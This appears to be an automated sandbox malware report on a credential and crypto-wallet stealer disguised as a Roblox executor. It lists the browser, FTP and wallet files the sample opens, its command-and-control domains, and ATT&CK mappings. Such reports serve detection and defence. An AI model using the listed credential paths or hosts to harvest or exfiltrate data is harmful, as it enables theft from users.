Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Directory queried: C:\Users\user\Documents\LIJDSFKJZG	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Directory queried: C:\Users\user\Documents\LIJDSFKJZG	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Directory queried: C:\Users\user\Documents\TQDFJHPUIU	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Directory queried: C:\Users\user\Documents\TQDFJHPUIU	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Directory queried: C:\Users\user\Documents\QCOILOQIKC	Jump to behavior
Source: C:\Users\user\Desktop\Solara-Roblox-Executor-v3.exe	Directory queried: C:\Users\user\Documents\QCOILOQIKC	Jump to behavior

Source: Yara match	File source: 00000006.00000003.2105519914.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.2093473590.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.2093656620.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Solara-Roblox-Executor-v3.exe PID: 2828, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: Solara-Roblox-Executor-v3.exe PID: 2828, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Windows Management Instrumentation	1 DLL Side-Loading	211 Process Injection	21 Virtualization/Sandbox Evasion	2 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Screen Capture	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	1 DLL Side-Loading	211 Process Injection	LSASS Memory	241 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	Logon Script (Windows)	Logon Script (Windows)	11 Deobfuscate/Decode Files or Information	Security Account Manager	21 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	41 Data from Local System	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	3 Obfuscated Files or Information	NTDS	1 Process Discovery	Distributed Component Object Model	2 Clipboard Data	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Software Packing	LSA Secrets	11 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	33 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Solara-Roblox-Executor-v3.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://microsoft.cop	0%	Avira URL Cloud	safe
https://fancywaxxers.shop/api/(b	100%	Avira URL Cloud	malware
https://fancywaxxers.shop/i	100%	Avira URL Cloud	malware
https://fancywaxxers.shop/apiPS	100%	Avira URL Cloud	malware
https://fancywaxxers.shop/api#	100%	Avira URL Cloud	malware
https://fancywaxxers.shop/apiO	100%	Avira URL Cloud	malware
https://fancywaxxers.shop/C1	100%	Avira URL Cloud	malware
https://fancywaxxers.shop/y	100%	Avira URL Cloud	malware
https://fancywaxxers.shop/C	100%	Avira URL Cloud	malware
https://fancywaxxers.shop/a	100%	Avira URL Cloud	malware
https://fancywaxxers.shop/q	100%	Avira URL Cloud	malware
https://fancywaxxers.shop/0	100%	Avira URL Cloud	malware
https://fancywaxxers.shop:443/api	100%	Avira URL Cloud	malware
https://fancywaxxers.shop/141638	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
fancywaxxers.shop	104.21.96.1	true	false		high
s-part-0017.t-0009.t-msedge.net	13.107.246.45	true	false		high

Contacted URLs

Name	Malicious	Reputation
rabidcowse.shop	false	high
wholersorie.shop	false	high
fancywaxxers.shop	false	high
cloudewahsj.shop	false	high
noisycuttej.shop	false	high
nearycrepso.shop	false	high
https://fancywaxxers.shop/api	false	high
framekgirus.shop	false	high
tirepublicerj.shop	false	high
abruptyopsn.shop	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051882953.00000000057C6000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051946446.00000000057C6000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051821112.00000000057C9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051882953.00000000057C6000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051946446.00000000057C6000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051821112.00000000057C9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://fancywaxxers.shop/api#	Solara-Roblox-Executor-v3.exe, 00000006.00000002.2145355482.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://fancywaxxers.shop/i	Solara-Roblox-Executor-v3.exe, 00000006.00000003.2105519914.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000002.2145355482.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2114278672.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051882953.00000000057C6000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051946446.00000000057C6000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051821112.00000000057C9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://fancywaxxers.shop/a	Solara-Roblox-Executor-v3.exe, 00000006.00000003.2105519914.000000000302F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	Solara-Roblox-Executor-v3.exe, 00000006.00000003.2078766043.0000000005824000.00000004.00000800.00020000.00000000.sdmp	false		high
https://fancywaxxers.shop/api/(b	Solara-Roblox-Executor-v3.exe, 00000006.00000003.2140783049.000000000302F000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000002.2145454851.000000000302F000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2114278672.000000000302F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.	Solara-Roblox-Executor-v3.exe, 00000006.00000003.2078705562.000000000581F000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2078766043.0000000005824000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051882953.00000000057C6000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051946446.00000000057C6000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051821112.00000000057C9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://fancywaxxers.shop/apiO	Solara-Roblox-Executor-v3.exe, 00000006.00000003.2050616380.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://crl.rootca1.amazontrust.com/rootca1.crl0	Solara-Roblox-Executor-v3.exe, 00000006.00000003.2077658211.0000000005844000.00000004.00000800.00020000.00000000.sdmp	false		high
http://microsoft.cop	Solara-Roblox-Executor-v3.exe, 00000006.00000003.2050616380.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2105519914.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000002.2145355482.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2093473590.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2114278672.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051882953.00000000057C6000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051946446.00000000057C6000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051821112.00000000057C9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	Solara-Roblox-Executor-v3.exe, 00000006.00000003.2077658211.0000000005844000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051882953.00000000057C6000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051946446.00000000057C6000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051821112.00000000057C9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta	Solara-Roblox-Executor-v3.exe, 00000006.00000003.2078705562.000000000581F000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2078766043.0000000005824000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	Solara-Roblox-Executor-v3.exe, 00000006.00000003.2078404139.0000000005AAF000.00000004.00000800.00020000.00000000.sdmp	false		high
https://fancywaxxers.shop/C1	Solara-Roblox-Executor-v3.exe, 00000006.00000002.2145454851.000000000302F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://ac.ecosia.org/autocomplete?q=	Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051882953.00000000057C6000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051946446.00000000057C6000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051821112.00000000057C9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg	Solara-Roblox-Executor-v3.exe, 00000006.00000003.2078705562.000000000581F000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2078766043.0000000005824000.00000004.00000800.00020000.00000000.sdmp	false		high
https://fancywaxxers.shop/apiPS	Solara-Roblox-Executor-v3.exe, 00000006.00000003.2077082218.0000000005817000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2077267157.0000000005818000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	Solara-Roblox-Executor-v3.exe, 00000006.00000003.2078705562.000000000581F000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2078766043.0000000005824000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.c.lencr.org/0	Solara-Roblox-Executor-v3.exe, 00000006.00000003.2077658211.0000000005844000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	Solara-Roblox-Executor-v3.exe, 00000006.00000003.2077658211.0000000005844000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051882953.00000000057C6000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051946446.00000000057C6000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051821112.00000000057C9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	Solara-Roblox-Executor-v3.exe, 00000006.00000003.2077658211.0000000005844000.00000004.00000800.00020000.00000000.sdmp	false		high
https://fancywaxxers.shop/C	Solara-Roblox-Executor-v3.exe, 00000006.00000003.2105519914.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000002.2145355482.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2093473590.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2114278672.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref	Solara-Roblox-Executor-v3.exe, 00000006.00000003.2078705562.000000000581F000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2078766043.0000000005824000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477	Solara-Roblox-Executor-v3.exe, 00000006.00000003.2078705562.000000000581F000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2078766043.0000000005824000.00000004.00000800.00020000.00000000.sdmp	false		high
https://fancywaxxers.shop/y	Solara-Roblox-Executor-v3.exe, 00000006.00000003.2140783049.000000000302F000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000002.2145454851.000000000302F000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2114278672.000000000302F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://fancywaxxers.shop/	Solara-Roblox-Executor-v3.exe, 00000006.00000002.2145355482.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2093473590.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2105519914.000000000302F000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2114278672.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.mozilla.org/products/firefoxgro.all	Solara-Roblox-Executor-v3.exe, 00000006.00000003.2078404139.0000000005AAF000.00000004.00000800.00020000.00000000.sdmp	false		high
https://fancywaxxers.shop/141638	Solara-Roblox-Executor-v3.exe, 00000006.00000003.2105519914.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000002.2145355482.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2093473590.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2114278672.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051882953.00000000057C6000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051946446.00000000057C6000.00000004.00000800.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2051821112.00000000057C9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://fancywaxxers.shop/0	Solara-Roblox-Executor-v3.exe, 00000006.00000003.2050616380.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://fancywaxxers.shop:443/api	Solara-Roblox-Executor-v3.exe, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2094257173.000000000302F000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2114278672.0000000003023000.00000004.00000020.00020000.00000000.sdmp, Solara-Roblox-Executor-v3.exe, 00000006.00000003.2093436705.000000000302F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://fancywaxxers.shop/q	Solara-Roblox-Executor-v3.exe, 00000006.00000002.2145454851.000000000302F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.96.1	fancywaxxers.shop	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1582867
Start date and time:	2024-12-31 17:22:17 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 14s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Solara-Roblox-Executor-v3.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@10/0@1/1
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 97% Number of executed functions: 46 Number of non-executed functions: 143
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.107.246.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target Solara-Roblox-Executor-v3.exe, PID 3136 because there are no executed function
Not all processes where analyzed, report is missing behavior information
